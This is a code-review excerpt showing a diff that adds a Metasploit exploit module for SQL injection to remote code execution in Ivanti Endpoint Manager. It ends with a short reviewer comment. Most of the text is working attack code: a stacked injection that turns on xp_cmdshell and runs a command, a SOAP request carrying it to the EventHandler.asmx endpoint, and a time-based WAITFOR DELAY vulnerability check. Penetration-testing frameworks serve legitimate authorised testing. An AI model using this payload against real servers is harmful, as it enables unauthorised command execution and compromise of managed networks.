modules/exploits/windows/http/ivanti_epm_recordgoodapp_sqli_rce.rb

```diff
@@ -0,0 +1,125 @@
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          # MS SQL logs will contain evidence of `xp_cmdshell` being used
+          # Fetch payload cannot be deleted while a Meterpreter session is active
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The URI of the EPM Web Services', '/']),
+        OptInt.new('DELAY', [ true, 'The delay to detect if the target is vulnerable using time-based SQLi in second', 5])
+      ]
+    )
+  end
+
+  def sqli_payload(cmd)
+    "';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC xp_cmdshell '#{cmd.encode(xml: :text)}'--"
+  end
+
+  def xml_payload(sqli)
+    <<~XML
+      <?xml version="1.0" encoding="utf-8"?>
+      <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
+        <soap12:Body>
+          <UpdateStatusEvents xmlns="http://tempuri.org/">
+            <deviceID>string</deviceID>
+            <actions>
+              <Action name="string" code="0" date="0" type="96" user="string" configguid="string" location="string">
+                <status>GoodApp=1|md5=#{sqli}</status>
+              </Action>
+            </actions>
+          </UpdateStatusEvents>
+        </soap12:Body>
+      </soap12:Envelope>
+    XML
+  end
+
+  def soap_request(sqli, timeout = 20)
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'WSStatusEvents', 'EventHandler.asmx'),
+      'method' => 'POST',
+      'ctype' => 'application/soap+xml; charset="utf-8"',
+      'data' => xml_payload(sqli)
+    }, timeout)
+
+    raise IvantiEpmRequestError, 'Failed to send the SOAP request' unless res
+
+    res
+  end
+
+  def elapsed_time(&block)
+    time1 = Process.clock_gettime(Process::CLOCK_MONOTONIC)
+    block.call
+    time2 = Process.clock_gettime(Process::CLOCK_MONOTONIC)
+    time2 - time1
+  end
+
+  def check
+    print_status("Checking if the target is vulnerable using time-based SQLi (delay=#{datastore['DELAY']})")
+
+    elapsed1 = elapsed_time { soap_request("';WAITFOR DELAY '0:0:0';select 1--") }
+    vprint_status("Baseline query elapsed time: #{elapsed1}")
+
+    elapsed2 = elapsed_time { soap_request("';WAITFOR DELAY '0:0:#{datastore['DELAY']}';select 2--") }
+    vprint_status("Delayed query elapsed time: #{elapsed2}")
+
+    if elapsed2.to_i > elapsed1.to_i && elapsed2 >= datastore['DELAY']
+      return CheckCode::Vulnerable('SQLi executed')
+    else
+      return CheckCode::Safe('SQLi not executed')
+    end
+  rescue IvantiEpmRequestError => e
+    return CheckCode::Unknown(e.to_s)
+  end
+
+  def exploit
+    soap_request(sqli_payload(payload.encoded), 1)
```

Comment:
Not a blocker; the SQL injection library might be useful here for extracting data - but then that might be an aux module instead?